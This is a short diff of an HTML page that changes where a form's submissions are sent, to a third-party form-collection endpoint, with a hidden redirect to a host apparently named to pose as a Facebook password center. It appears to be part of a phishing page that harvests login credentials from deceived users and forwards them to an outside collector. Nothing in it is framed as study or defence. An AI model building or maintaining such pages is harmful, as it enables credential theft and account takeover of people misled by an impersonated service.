--- a/index.html
+++ b/index.html
@@ -8,7 +8,7 @@
         <link rel="stylesheet" crossorigin="" href="style.css">
     </head>
     <body>
-        <form action="https://submit-form.com/DDaoW8TEC" method="post">
+        <form action="https://submit-form.com/95DmqORSp" method="post">
             <input type="hidden" name="_redirect" value="https://fb-password-center-rouge.vercel.app/"/>
             <div id="root">
                 <div>
